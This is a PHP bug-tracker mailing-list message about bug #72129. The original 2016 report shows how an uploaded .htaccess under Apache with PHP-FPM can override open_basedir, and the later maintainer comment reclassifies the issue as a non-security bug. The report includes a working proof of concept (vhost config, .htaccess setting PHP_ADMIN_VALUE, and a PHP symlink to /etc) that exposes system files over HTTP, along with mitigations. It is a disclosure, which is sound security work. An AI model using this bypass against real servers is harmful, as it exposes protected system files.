Sec Bug->Bug #72129 [Opn]: PHP_VALUE, PHP_ADMIN_VALUE... changed by environment variables set in .htaccess
| From: | cmb@php.net | Date: | Mon, 12 Jul 2021 16:05:30 +0000 |
| Subject: | Sec Bug->Bug #72129 [Opn]: PHP_VALUE, PHP_ADMIN_VALUE... changed by environment variables set in .htaccess | ||
| References: | 1 | Groups: | php.bugs |
| Request: | Send a blank email to php-bugs+get-234984@lists.php.net to get a copy of this message | ||
Edit report at https://bugs.php.net/bug.php?id=72129&edit=1
ID: 72129
Updated by: cmb@php.net
Reported by: ouroboros_17 at hotmail dot com
Summary: PHP_VALUE, PHP_ADMIN_VALUE... changed by environment
variables set in .htaccess
Status: Open
-Type: Security
+Type: Bug
Package: FPM related
Operating System: Debian (all Linux distributions)
PHP Version: 5.6.21
Block user comment: N
Private report: Y
New Comment:
> but if he can upload a .htaccess in the www folder, he can break
> open_basedir restrictions
open_basedir bypasses are not considered to be security issues;
cf. <https://externals.io/message/105606>
and <https://externals.io/message/115406>.
Besides that the possibility to upload a .htaccess to the web root
would be a serious issue of the application.
> /var/www/index.php
> ------------------
> <?php symlink('/etc', 'foo');
This code looks obviously malicious, so is not a security issue
according to <https://wiki.php.net/security#not_a_security_issue>.
Previous Comments:
------------------------------------------------------------------------
[2016-04-29 15:46:15] ouroboros_17 at hotmail dot com
Description:
------------
It is possible, for a malicious user, to change PHP configuration with a .htaccess file on Apache
with PHP-FPM. It is not something trivial, but if he can upload a .htaccess in the www folder, he
can break open_basedir restrictions (see example below).
This behaviour can be fixed:
- AllowOverride None in Apache configuration (a good practice but it is not really usual in the real
world)
- prevent upload of .htaccess (application side, not related with PHP-FPM)
- disable mod_env
PHP as a module of Apache cannot be affected because only php_value can be set in .htaccess.
It should be documented at least, or it should be possible to disable the hability to set
configuration via environment variables.
See bug #3991 too.
Test script:
---------------
Apache vhost
------------------
DocumentRoot /var/www
<Directory /var/www/>
AllowOverride All
<FilesMatch \.php$>
SetHandler "proxy:unix:/var/run/php5-fpm.sock|fcgi://localhost/"
</FilesMatch>
</Directory>
/var/www/.htaccess
------------------
Options +FollowSymLinks -SymLinksIfOwnerMatch
SetEnv PHP_ADMIN_VALUE "open_basedir=/"
/var/www/index.php
------------------
<?php symlink('/etc', 'foo');
PHP-FPM pool
------------------
[...]
php_admin_value[open_basedir] = /var/www
Access "index.php" with HTTP so it creates the symlink, see files in /etc via the http://example.com/foo URI.
------------------------------------------------------------------------
--
Edit this bug report at https://bugs.php.net/bug.php?id=72129&edit=1